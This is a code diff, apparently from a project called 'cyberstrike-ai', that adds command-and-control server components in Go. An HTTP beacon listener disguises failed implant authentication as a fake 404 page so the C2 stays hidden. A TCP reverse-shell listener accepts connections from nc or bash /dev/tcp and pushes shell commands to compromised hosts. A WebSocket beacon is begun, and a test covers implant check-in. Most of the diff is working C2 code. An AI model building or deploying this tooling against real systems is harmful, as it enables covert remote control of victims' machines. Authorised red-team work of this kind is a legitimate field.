if taskID == "" || strings.Contains(taskID, "/") || strings.Contains(taskID, "\\") || strings.Contains(taskID, "..") {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
fpath := filepath.Join(l.manager.StorageDir(), "downstream", taskID+".bin")
|
||||
absPath, err := filepath.Abs(fpath)
|
||||
if err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream"))
|
||||
if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
data, err := os.ReadFile(absPath)
|
||||
if err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
l.writeEncrypted(w, map[string]interface{}{
|
||||
"file_data": base64Encode(data),
|
||||
})
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// 鉴权 / 输出辅助
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
// checkImplantToken 校验 X-Implant-Token header(恒定时间比较防止时序攻击)
|
||||
func (l *HTTPBeaconListener) checkImplantToken(r *http.Request) bool {
|
||||
got := r.Header.Get("X-Implant-Token")
|
||||
if got == "" {
|
||||
got = r.Header.Get("Cookie") // 兼容 Malleable Profile 用 Cookie 携带
|
||||
}
|
||||
expected := l.rec.ImplantToken
|
||||
if got == "" || expected == "" {
|
||||
return false
|
||||
}
|
||||
return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1
|
||||
}
|
||||
|
||||
// disguisedReject 鉴权失败时返回 404,避免暴露 listener 是 C2
|
||||
func (l *HTTPBeaconListener) disguisedReject(w http.ResponseWriter) {
|
||||
w.Header().Set("Content-Type", "text/html; charset=utf-8")
|
||||
w.WriteHeader(http.StatusNotFound)
|
||||
_, _ = fmt.Fprint(w, "<html><body><h1>404 Not Found</h1></body></html>")
|
||||
}
|
||||
|
||||
// writeEncrypted JSON 序列化 + AES-GCM 加密 + 写回
|
||||
func (l *HTTPBeaconListener) writeEncrypted(w http.ResponseWriter, payload interface{}) {
|
||||
body, err := json.Marshal(payload)
|
||||
if err != nil {
|
||||
http.Error(w, "encode failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
|
||||
if err != nil {
|
||||
http.Error(w, "encrypt failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
w.Header().Set("Content-Type", "application/octet-stream")
|
||||
_, _ = w.Write([]byte(enc))
|
||||
}
|
||||
|
||||
// loadProfile loads Malleable Profile from DB if the listener has a profile_id configured
|
||||
func (l *HTTPBeaconListener) loadProfile() {
|
||||
if l.rec.ProfileID == "" {
|
||||
return
|
||||
}
|
||||
profile, err := l.manager.GetProfile(l.rec.ProfileID)
|
||||
if err != nil || profile == nil {
|
||||
l.logger.Warn("加载 Malleable Profile 失败,使用默认配置",
|
||||
zap.String("profile_id", l.rec.ProfileID), zap.Error(err))
|
||||
return
|
||||
}
|
||||
l.profile = profile
|
||||
l.logger.Info("Malleable Profile 已加载",
|
||||
zap.String("profile_id", profile.ID),
|
||||
zap.String("profile_name", profile.Name),
|
||||
zap.String("user_agent", profile.UserAgent))
|
||||
}
|
||||
|
||||
// withProfileHeaders wraps a handler to inject Malleable Profile response headers
|
||||
func (l *HTTPBeaconListener) withProfileHeaders(next http.HandlerFunc) http.HandlerFunc {
|
||||
return func(w http.ResponseWriter, r *http.Request) {
|
||||
if l.profile != nil && len(l.profile.ResponseHeaders) > 0 {
|
||||
for k, v := range l.profile.ResponseHeaders {
|
||||
w.Header().Set(k, v)
|
||||
}
|
||||
}
|
||||
next(w, r)
|
||||
}
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// TLS 自签证书(仅供测试 / Phase 2 默认行为)
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
func (l *HTTPBeaconListener) buildTLSConfig() (*tls.Config, error) {
|
||||
// 操作员显式提供证书 → 优先使用
|
||||
if l.cfg.TLSCertPath != "" && l.cfg.TLSKeyPath != "" {
|
||||
cert, err := tls.LoadX509KeyPair(l.cfg.TLSCertPath, l.cfg.TLSKeyPath)
|
||||
if err == nil {
|
||||
return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil
|
||||
}
|
||||
l.logger.Warn("加载 TLS 证书失败,回退自签", zap.Error(err))
|
||||
}
|
||||
// 自签证书:CN 用 listener 名,避免重复
|
||||
cert, err := generateSelfSignedCert(l.rec.Name)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil
|
||||
}
|
||||
|
||||
func generateSelfSignedCert(cn string) (tls.Certificate, error) {
|
||||
priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
|
||||
if err != nil {
|
||||
return tls.Certificate{}, err
|
||||
}
|
||||
serial, _ := rand.Int(rand.Reader, big.NewInt(1<<62))
|
||||
tmpl := &x509.Certificate{
|
||||
SerialNumber: serial,
|
||||
Subject: pkix.Name{CommonName: cn},
|
||||
NotBefore: time.Now().Add(-1 * time.Hour),
|
||||
NotAfter: time.Now().Add(365 * 24 * time.Hour),
|
||||
KeyUsage: x509.KeyUsageDigitalSignature,
|
||||
ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
|
||||
IPAddresses: []net.IP{net.ParseIP("127.0.0.1")},
|
||||
DNSNames: []string{"localhost"},
|
||||
}
|
||||
der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &priv.PublicKey, priv)
|
||||
if err != nil {
|
||||
return tls.Certificate{}, err
|
||||
}
|
||||
keyDER, err := x509.MarshalECPrivateKey(priv)
|
||||
if err != nil {
|
||||
return tls.Certificate{}, err
|
||||
}
|
||||
certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der})
|
||||
keyPEM := pem.EncodeToMemory(&pem.Block{Type: "EC PRIVATE KEY", Bytes: keyDER})
|
||||
return tls.X509KeyPair(certPEM, keyPEM)
|
||||
}
|
||||
|
||||
func base64Encode(data []byte) string {
|
||||
return base64.StdEncoding.EncodeToString(data)
|
||||
}
|
||||
|
||||
func shortHash(s string) string {
|
||||
h := sha256.Sum256([]byte(s))
|
||||
return hex.EncodeToString(h[:6])
|
||||
}
|
||||
|
||||
// isPlaintextClient 判断请求是否来自明文客户端(curl oneliner 等)
|
||||
// 完整 beacon 二进制会设置 Content-Type: application/octet-stream
|
||||
func (l *HTTPBeaconListener) isPlaintextClient(r *http.Request) bool {
|
||||
ct := r.Header.Get("Content-Type")
|
||||
accept := r.Header.Get("Accept")
|
||||
return strings.Contains(ct, "application/json") ||
|
||||
strings.Contains(accept, "application/json") ||
|
||||
strings.Contains(r.UserAgent(), "curl/")
|
||||
}
|
||||
|
||||
// ApplyJitter 给定基础 sleep + jitter 百分比,返回随机抖动后的 duration
|
||||
// 公开给 listener_websocket / payload 模板共用,避免重复实现
|
||||
func ApplyJitter(baseSec, jitterPercent int) time.Duration {
|
||||
if baseSec <= 0 {
|
||||
return 0
|
||||
}
|
||||
if jitterPercent <= 0 {
|
||||
return time.Duration(baseSec) * time.Second
|
||||
}
|
||||
if jitterPercent > 100 {
|
||||
jitterPercent = 100
|
||||
}
|
||||
delta := mrand.Intn(2*jitterPercent+1) - jitterPercent // [-j, +j]
|
||||
factor := 1.0 + float64(delta)/100.0
|
||||
return time.Duration(float64(baseSec)*factor) * time.Second
|
||||
}
|
||||
@@ -0,0 +1,129 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"io"
|
||||
"net"
|
||||
"net/http"
|
||||
"path/filepath"
|
||||
"strconv"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// 集成验证:路由、鉴权伪装 404、明文 check-in JSON 回包。
|
||||
func TestHTTPBeaconListener_CheckInMatrix(t *testing.T) {
|
||||
tmp := t.TempDir()
|
||||
dbPath := filepath.Join(tmp, "c2.sqlite")
|
||||
db, err := database.NewDB(dbPath, zap.NewNop())
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
t.Cleanup(func() { _ = db.Close() })
|
||||
|
||||
lnPick, err := net.Listen("tcp", "127.0.0.1:0")
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
port := lnPick.Addr().(*net.TCPAddr).Port
|
||||
_ = lnPick.Close()
|
||||
|
||||
keyB64, err := GenerateAESKey()
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
token := "test-implant-token-fixed"
|
||||
|
||||
lid := "l_testhttpbeacon01"
|
||||
rec := &database.C2Listener{
|
||||
ID: lid,
|
||||
Name: "t",
|
||||
Type: string(ListenerTypeHTTPBeacon),
|
||||
BindHost: "127.0.0.1",
|
||||
BindPort: port,
|
||||
EncryptionKey: keyB64,
|
||||
ImplantToken: token,
|
||||
Status: "stopped",
|
||||
ConfigJSON: `{"beacon_check_in_path":"/check_in"}`,
|
||||
CreatedAt: time.Now(),
|
||||
}
|
||||
if err := db.CreateC2Listener(rec); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
|
||||
m := NewManager(db, zap.NewNop(), filepath.Join(tmp, "c2store"))
|
||||
m.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener)
|
||||
if _, err := m.StartListener(lid); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
t.Cleanup(func() { _ = m.StopListener(lid) })
|
||||
|
||||
base := "http://127.0.0.1:" + strconv.Itoa(port)
|
||||
client := &http.Client{Timeout: 5 * time.Second}
|
||||
|
||||
t.Run("wrong_path_go_default_404", func(t *testing.T) {
|
||||
resp, err := client.Post(base+"/nope", "application/json", strings.NewReader(`{}`))
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
b, _ := io.ReadAll(resp.Body)
|
||||
if resp.StatusCode != http.StatusNotFound {
|
||||
t.Fatalf("status=%d body=%q", resp.StatusCode, b)
|
||||
}
|
||||
if !strings.Contains(string(b), "404") || !strings.Contains(strings.ToLower(string(b)), "not found") {
|
||||
t.Fatalf("unexpected body: %q", b)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("check_in_wrong_token_disguised_html_404", func(t *testing.T) {
|
||||
req, _ := http.NewRequest(http.MethodPost, base+"/check_in", bytes.NewBufferString(`{"hostname":"h"}`))
|
||||
req.Header.Set("X-Implant-Token", "wrong-token")
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
resp, err := client.Do(req)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
b, _ := io.ReadAll(resp.Body)
|
||||
if resp.StatusCode != http.StatusNotFound {
|
||||
t.Fatalf("status=%d", resp.StatusCode)
|
||||
}
|
||||
ct := resp.Header.Get("Content-Type")
|
||||
if !strings.Contains(ct, "text/html") {
|
||||
t.Fatalf("content-type=%q body=%q", ct, b)
|
||||
}
|
||||
if !strings.Contains(string(b), "404 Not Found") {
|
||||
t.Fatalf("expected disguised HTML, got: %q", b)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("check_in_ok_plaintext_json", func(t *testing.T) {
|
||||
body := `{"hostname":"n","username":"u","os":"Linux","arch":"amd64","internal_ip":"10.0.0.1","pid":42}`
|
||||
req, _ := http.NewRequest(http.MethodPost, base+"/check_in", strings.NewReader(body))
|
||||
req.Header.Set("X-Implant-Token", token)
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
resp, err := client.Do(req)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
b, _ := io.ReadAll(resp.Body)
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
t.Fatalf("status=%d body=%s", resp.StatusCode, b)
|
||||
}
|
||||
var out ImplantCheckInResponse
|
||||
if err := json.Unmarshal(b, &out); err != nil {
|
||||
t.Fatalf("json: %v body=%s", err, b)
|
||||
}
|
||||
if out.SessionID == "" || out.NextSleep <= 0 {
|
||||
t.Fatalf("bad response: %+v", out)
|
||||
}
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,439 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"context"
|
||||
"crypto/sha256"
|
||||
"encoding/hex"
|
||||
"fmt"
|
||||
"io"
|
||||
"net"
|
||||
"regexp"
|
||||
"strings"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// TCPReverseListener 监听 TCP 端口,等待目标机反弹连接。
|
||||
// 经典模式:纯交互式 raw shell,与 nc / bash -i >& /dev/tcp 兼容。
|
||||
// 二进制 Beacon:连接后先发送魔数 CSB1,随后使用与 HTTP Beacon 相同的 AES-GCM JSON 语义(成帧见 tcp_beacon_server.go)。
|
||||
// 每个新连接自动生成一个 implant_uuid(基于远端地址 + 启动时间 hash),登记为 c2_session;
|
||||
// 任务派发:使用同步 exec 模式 —— 收到 task 时直接 send 命令字节并读取输出(带结束标记)。
|
||||
type TCPReverseListener struct {
|
||||
rec *database.C2Listener
|
||||
cfg *ListenerConfig
|
||||
manager *Manager
|
||||
logger *zap.Logger
|
||||
|
||||
mu sync.Mutex
|
||||
listener net.Listener
|
||||
stopCh chan struct{}
|
||||
conns map[string]*tcpReverseConn // session_id → 连接
|
||||
stopOnce sync.Once
|
||||
}
|
||||
|
||||
// tcpReverseConn 单个反弹会话的运行时状态
|
||||
type tcpReverseConn struct {
|
||||
sessionID string
|
||||
conn net.Conn
|
||||
reader *bufio.Reader
|
||||
writeMu sync.Mutex // 序列化 write,避免并发 task 写入
|
||||
taskMode int32 // 原子标志: 0=空闲(handleConn读), 1=任务中(runTaskOnConn独占读)
|
||||
}
|
||||
|
||||
// NewTCPReverseListener 工厂方法(注册到 ListenerRegistry["tcp_reverse"])
|
||||
func NewTCPReverseListener(ctx ListenerCreationCtx) (Listener, error) {
|
||||
return &TCPReverseListener{
|
||||
rec: ctx.Listener,
|
||||
cfg: ctx.Config,
|
||||
manager: ctx.Manager,
|
||||
logger: ctx.Logger,
|
||||
stopCh: make(chan struct{}),
|
||||
conns: make(map[string]*tcpReverseConn),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Type 返回类型常量
|
||||
func (l *TCPReverseListener) Type() string { return string(ListenerTypeTCPReverse) }
|
||||
|
||||
// Start 启动 TCP 监听,accept 在独立 goroutine 中运行
|
||||
func (l *TCPReverseListener) Start() error {
|
||||
addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort)
|
||||
ln, err := net.Listen("tcp", addr)
|
||||
if err != nil {
|
||||
if isAddrInUse(err) {
|
||||
return ErrPortInUse
|
||||
}
|
||||
return err
|
||||
}
|
||||
l.mu.Lock()
|
||||
l.listener = ln
|
||||
l.mu.Unlock()
|
||||
go l.acceptLoop()
|
||||
go l.taskDispatcherLoop()
|
||||
return nil
|
||||
}
|
||||
|
||||
// Stop 关闭监听 + 所有活动连接
|
||||
func (l *TCPReverseListener) Stop() error {
|
||||
l.stopOnce.Do(func() {
|
||||
close(l.stopCh)
|
||||
})
|
||||
l.mu.Lock()
|
||||
if l.listener != nil {
|
||||
_ = l.listener.Close()
|
||||
l.listener = nil
|
||||
}
|
||||
for sid, c := range l.conns {
|
||||
_ = c.conn.Close()
|
||||
delete(l.conns, sid)
|
||||
}
|
||||
l.mu.Unlock()
|
||||
return nil
|
||||
}
|
||||
|
||||
func (l *TCPReverseListener) acceptLoop() {
|
||||
for {
|
||||
l.mu.Lock()
|
||||
ln := l.listener
|
||||
l.mu.Unlock()
|
||||
if ln == nil {
|
||||
return
|
||||
}
|
||||
conn, err := ln.Accept()
|
||||
if err != nil {
|
||||
select {
|
||||
case <-l.stopCh:
|
||||
return
|
||||
default:
|
||||
}
|
||||
if isClosedConnErr(err) {
|
||||
return
|
||||
}
|
||||
l.logger.Warn("tcp_reverse accept 失败", zap.Error(err))
|
||||
continue
|
||||
}
|
||||
go l.handleConn(conn)
|
||||
}
|
||||
}
|
||||
|
||||
// handleConn 一个连接=一个会话:先识别二进制 TCP Beacon(魔数 CSB1),否则走经典交互式 shell。
|
||||
func (l *TCPReverseListener) handleConn(conn net.Conn) {
|
||||
br := bufio.NewReader(conn)
|
||||
_ = conn.SetReadDeadline(time.Now().Add(20 * time.Second))
|
||||
prefix, err := br.Peek(4)
|
||||
if err == nil && len(prefix) == 4 && string(prefix) == tcpBeaconMagic {
|
||||
if _, err := br.Discard(4); err != nil {
|
||||
_ = conn.Close()
|
||||
return
|
||||
}
|
||||
_ = conn.SetReadDeadline(time.Time{})
|
||||
l.handleTCPBeaconSession(conn, br)
|
||||
return
|
||||
}
|
||||
_ = conn.SetReadDeadline(time.Time{})
|
||||
l.handleShellConn(conn, br)
|
||||
}
|
||||
|
||||
// handleShellConn 经典裸 TCP 反弹 shell(与 nc/bash /dev/tcp 兼容)。
|
||||
func (l *TCPReverseListener) handleShellConn(conn net.Conn, br *bufio.Reader) {
|
||||
remote := conn.RemoteAddr().String()
|
||||
host, _, _ := net.SplitHostPort(remote)
|
||||
// 用 listener+remote_ip 生成稳定 implant_uuid,使同一来源的重连复用同一会话
|
||||
uuidSeed := fmt.Sprintf("%s|%s", l.rec.ID, host)
|
||||
hash := sha256.Sum256([]byte(uuidSeed))
|
||||
implantUUID := hex.EncodeToString(hash[:8])
|
||||
|
||||
checkin := ImplantCheckInRequest{
|
||||
ImplantUUID: implantUUID,
|
||||
Hostname: "tcp_" + host,
|
||||
Username: "unknown",
|
||||
OS: "unknown",
|
||||
Arch: "unknown",
|
||||
InternalIP: host,
|
||||
SleepSeconds: 0, // 交互式不需要 sleep
|
||||
JitterPercent: 0,
|
||||
Metadata: map[string]interface{}{
|
||||
"transport": "tcp_reverse",
|
||||
"remote": remote,
|
||||
},
|
||||
}
|
||||
session, err := l.manager.IngestCheckIn(l.rec.ID, checkin)
|
||||
if err != nil {
|
||||
l.logger.Warn("tcp_reverse 登记会话失败", zap.Error(err))
|
||||
_ = conn.Close()
|
||||
return
|
||||
}
|
||||
|
||||
tc := &tcpReverseConn{
|
||||
sessionID: session.ID,
|
||||
conn: conn,
|
||||
reader: br,
|
||||
}
|
||||
l.mu.Lock()
|
||||
if old, exists := l.conns[session.ID]; exists {
|
||||
_ = old.conn.Close()
|
||||
}
|
||||
l.conns[session.ID] = tc
|
||||
l.mu.Unlock()
|
||||
|
||||
defer func() {
|
||||
l.mu.Lock()
|
||||
if cur, ok := l.conns[session.ID]; ok && cur == tc {
|
||||
delete(l.conns, session.ID)
|
||||
_ = l.manager.MarkSessionDead(session.ID)
|
||||
}
|
||||
l.mu.Unlock()
|
||||
_ = conn.Close()
|
||||
}()
|
||||
|
||||
// 主循环:检测连接存活 + 读取非任务期间的 unsolicited 输出
|
||||
// 注意:必须统一使用 tc.reader 读取,避免与 runTaskOnConn 的 bufio.Reader 产生数据分裂
|
||||
buf := make([]byte, 4096)
|
||||
for {
|
||||
select {
|
||||
case <-l.stopCh:
|
||||
return
|
||||
default:
|
||||
}
|
||||
// 任务执行中,runTaskOnConn 独占读取权,主循环暂停
|
||||
if atomic.LoadInt32(&tc.taskMode) == 1 {
|
||||
time.Sleep(100 * time.Millisecond)
|
||||
continue
|
||||
}
|
||||
_ = conn.SetReadDeadline(time.Now().Add(60 * time.Second))
|
||||
n, err := tc.reader.Read(buf)
|
||||
if n > 0 {
|
||||
// 收到数据也刷新心跳
|
||||
_ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now())
|
||||
if atomic.LoadInt32(&tc.taskMode) == 0 {
|
||||
l.manager.publishEvent("info", "task", session.ID, "",
|
||||
"stdout(unsolicited)", map[string]interface{}{
|
||||
"output": string(buf[:n]),
|
||||
})
|
||||
}
|
||||
}
|
||||
if err != nil {
|
||||
if err == io.EOF || isClosedConnErr(err) {
|
||||
return
|
||||
}
|
||||
if ne, ok := err.(net.Error); ok && ne.Timeout() {
|
||||
// 读超时 = 连接仍存活但无数据,刷新心跳防止看门狗误判
|
||||
_ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now())
|
||||
continue
|
||||
}
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// taskDispatcherLoop 周期扫描所有活动会话的任务队列,下发 exec/shell 类型的同步命令
|
||||
func (l *TCPReverseListener) taskDispatcherLoop() {
|
||||
t := time.NewTicker(500 * time.Millisecond)
|
||||
defer t.Stop()
|
||||
for {
|
||||
select {
|
||||
case <-l.stopCh:
|
||||
return
|
||||
case <-t.C:
|
||||
l.mu.Lock()
|
||||
snapshot := make([]*tcpReverseConn, 0, len(l.conns))
|
||||
for _, c := range l.conns {
|
||||
snapshot = append(snapshot, c)
|
||||
}
|
||||
l.mu.Unlock()
|
||||
for _, c := range snapshot {
|
||||
envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 5)
|
||||
if err != nil || len(envelopes) == 0 {
|
||||
continue
|
||||
}
|
||||
for _, env := range envelopes {
|
||||
go l.runTaskOnConn(c, env)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// runTaskOnConn 把一条 task 转成 raw shell 命令发送,通过结束标记读输出
|
||||
func (l *TCPReverseListener) runTaskOnConn(c *tcpReverseConn, env TaskEnvelope) {
|
||||
startedAt := NowUnixMillis()
|
||||
cmd, ok := buildTCPCommand(TaskType(env.TaskType), env.Payload)
|
||||
if !ok {
|
||||
l.reportTaskResult(env.TaskID, startedAt, false, "", "tcp_reverse listener 不支持该任务类型: "+env.TaskType, "", "")
|
||||
return
|
||||
}
|
||||
|
||||
// 独占读取权:通知 handleConn 主循环暂停
|
||||
atomic.StoreInt32(&c.taskMode, 1)
|
||||
defer atomic.StoreInt32(&c.taskMode, 0)
|
||||
|
||||
// 等待 handleConn 循环退出读取(给 100ms 让正在进行的 Read 超时/完成)
|
||||
time.Sleep(150 * time.Millisecond)
|
||||
|
||||
// 排空 buffer 中残留的 bash 提示符等数据
|
||||
drainStaleData(c.reader, c.conn)
|
||||
|
||||
endMark := fmt.Sprintf("__C2_DONE_%s__", env.TaskID)
|
||||
wrapped := fmt.Sprintf("%s\necho %s\n", strings.TrimSpace(cmd), endMark)
|
||||
c.writeMu.Lock()
|
||||
_ = c.conn.SetWriteDeadline(time.Now().Add(15 * time.Second))
|
||||
if _, err := c.conn.Write([]byte(wrapped)); err != nil {
|
||||
c.writeMu.Unlock()
|
||||
l.reportTaskResult(env.TaskID, startedAt, false, "", "写命令失败: "+err.Error(), "", "")
|
||||
return
|
||||
}
|
||||
c.writeMu.Unlock()
|
||||
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
|
||||
defer cancel()
|
||||
output, err := readUntilMarker(ctx, c.reader, endMark)
|
||||
if err != nil {
|
||||
l.reportTaskResult(env.TaskID, startedAt, false, output, "读取结果失败: "+err.Error(), "", "")
|
||||
return
|
||||
}
|
||||
cleaned := cleanShellOutput(output, cmd)
|
||||
l.reportTaskResult(env.TaskID, startedAt, true, cleaned, "", "", "")
|
||||
}
|
||||
|
||||
// reportTaskResult 适配 Manager.IngestTaskResult,统一报告路径
|
||||
func (l *TCPReverseListener) reportTaskResult(taskID string, startedAtMS int64, success bool, output, errMsg, blobB64, blobSuffix string) {
|
||||
_ = l.manager.IngestTaskResult(TaskResultReport{
|
||||
TaskID: taskID,
|
||||
Success: success,
|
||||
Output: output,
|
||||
Error: errMsg,
|
||||
BlobBase64: blobB64,
|
||||
BlobSuffix: blobSuffix,
|
||||
StartedAt: startedAtMS,
|
||||
EndedAt: NowUnixMillis(),
|
||||
})
|
||||
}
|
||||
|
||||
// buildTCPCommand 把 (TaskType + payload) 转成 raw shell 命令字符串。
|
||||
// 仅支持 TCP 反弹模式可直接执行的最简任务类型;upload/download/screenshot 这些
|
||||
// 需要二进制传输的能力建议使用 http_beacon。
|
||||
func buildTCPCommand(t TaskType, payload map[string]interface{}) (string, bool) {
|
||||
switch t {
|
||||
case TaskTypeExec, TaskTypeShell:
|
||||
cmd, _ := payload["command"].(string)
|
||||
return cmd, true
|
||||
case TaskTypePwd:
|
||||
return "pwd 2>/dev/null || cd", true
|
||||
case TaskTypeLs:
|
||||
path, _ := payload["path"].(string)
|
||||
if strings.TrimSpace(path) == "" {
|
||||
path = "."
|
||||
}
|
||||
return "ls -la " + shellQuote(path), true
|
||||
case TaskTypePs:
|
||||
return "ps -ef 2>/dev/null || ps aux", true
|
||||
case TaskTypeKillProc:
|
||||
pid, _ := payload["pid"].(float64)
|
||||
if pid <= 0 {
|
||||
return "", false
|
||||
}
|
||||
return fmt.Sprintf("kill -9 %d", int(pid)), true
|
||||
case TaskTypeCd:
|
||||
path, _ := payload["path"].(string)
|
||||
if strings.TrimSpace(path) == "" {
|
||||
return "", false
|
||||
}
|
||||
return "cd " + shellQuote(path) + " && pwd", true
|
||||
case TaskTypeExit:
|
||||
return "exit 0", true
|
||||
}
|
||||
return "", false
|
||||
}
|
||||
|
||||
// readUntilMarker 从 reader 持续读,直到匹配 endMarker;返回去掉标记后的输出
|
||||
func readUntilMarker(ctx context.Context, r *bufio.Reader, marker string) (string, error) {
|
||||
var sb strings.Builder
|
||||
buf := make([]byte, 4096)
|
||||
deadline := time.Now().Add(60 * time.Second)
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return sb.String(), ctx.Err()
|
||||
default:
|
||||
}
|
||||
if time.Now().After(deadline) {
|
||||
return sb.String(), fmt.Errorf("timeout")
|
||||
}
|
||||
n, err := r.Read(buf)
|
||||
if n > 0 {
|
||||
sb.Write(buf[:n])
|
||||
if idx := strings.Index(sb.String(), marker); idx >= 0 {
|
||||
return strings.TrimRight(sb.String()[:idx], "\r\n"), nil
|
||||
}
|
||||
}
|
||||
if err != nil {
|
||||
return sb.String(), err
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func shellQuote(s string) string {
|
||||
return "'" + strings.ReplaceAll(s, "'", "'\\''") + "'"
|
||||
}
|
||||
|
||||
func isAddrInUse(err error) bool {
|
||||
if err == nil {
|
||||
return false
|
||||
}
|
||||
return strings.Contains(strings.ToLower(err.Error()), "address already in use") ||
|
||||
strings.Contains(strings.ToLower(err.Error()), "bind: only one usage")
|
||||
}
|
||||
|
||||
func isClosedConnErr(err error) bool {
|
||||
if err == nil {
|
||||
return false
|
||||
}
|
||||
es := err.Error()
|
||||
return strings.Contains(es, "use of closed network connection") ||
|
||||
strings.Contains(es, "connection reset by peer")
|
||||
}
|
||||
|
||||
// drainStaleData 用短超时读取并丢弃 buffer 中残留的 shell 提示符等数据
|
||||
func drainStaleData(r *bufio.Reader, conn net.Conn) {
|
||||
buf := make([]byte, 4096)
|
||||
for {
|
||||
_ = conn.SetReadDeadline(time.Now().Add(200 * time.Millisecond))
|
||||
n, err := r.Read(buf)
|
||||
if n == 0 || err != nil {
|
||||
break
|
||||
}
|
||||
}
|
||||
// 恢复较长的读超时
|
||||
_ = conn.SetReadDeadline(time.Time{})
|
||||
}
|
||||
|
||||
var shellPromptRe = regexp.MustCompile(`(?m)^.*?(bash[\-\d.]*\$|[\$#%>]\s*)$`)
|
||||
|
||||
// cleanShellOutput 过滤 bash 提示符行和命令回显,返回干净的命令输出
|
||||
func cleanShellOutput(raw, cmd string) string {
|
||||
lines := strings.Split(raw, "\n")
|
||||
var cleaned []string
|
||||
cmdTrimmed := strings.TrimSpace(cmd)
|
||||
echoSkipped := false
|
||||
for _, line := range lines {
|
||||
trimmed := strings.TrimRight(line, "\r \t")
|
||||
// 跳过命令回显行(bash 会 echo 回输入的命令)
|
||||
if !echoSkipped && cmdTrimmed != "" && strings.Contains(trimmed, cmdTrimmed) {
|
||||
echoSkipped = true
|
||||
continue
|
||||
}
|
||||
// 跳过纯 shell 提示符行
|
||||
if shellPromptRe.MatchString(trimmed) && len(strings.TrimSpace(shellPromptRe.ReplaceAllString(trimmed, ""))) == 0 {
|
||||
continue
|
||||
}
|
||||
cleaned = append(cleaned, line)
|
||||
}
|
||||
result := strings.Join(cleaned, "\n")
|
||||
return strings.TrimSpace(result)
|
||||
}
|
||||
@@ -0,0 +1,297 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/subtle"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"net"
|
||||
"net/http"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/gorilla/websocket"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// WebSocketListener 提供低延迟的双向 WebSocket Beacon。
|
||||
// 与 HTTP Beacon 相比:
|
||||
// - beacon 与服务端保持长连接,无需轮询,新任务可"秒到";
|
||||
// - 适合需要交互式快速响应的场景(如实时键盘 / 流式输出);
|
||||
// - 协议依然走 AES-256-GCM,握手时校验 X-Implant-Token;
|
||||
// - 一个 listener 仅处理一个 WS 路径(默认 /ws),但可承载多个并发 implant。
|
||||
//
|
||||
// 帧协议(皆为加密后 base64 字符串走 TextMessage):
|
||||
// client → server:{"type":"checkin"|"result", "data": <ImplantCheckInRequest|TaskResultReport>}
|
||||
// server → client:{"type":"task", "data": <TaskEnvelope>} 或 {"type":"sleep","data":{"sleep":N,"jitter":J}}
|
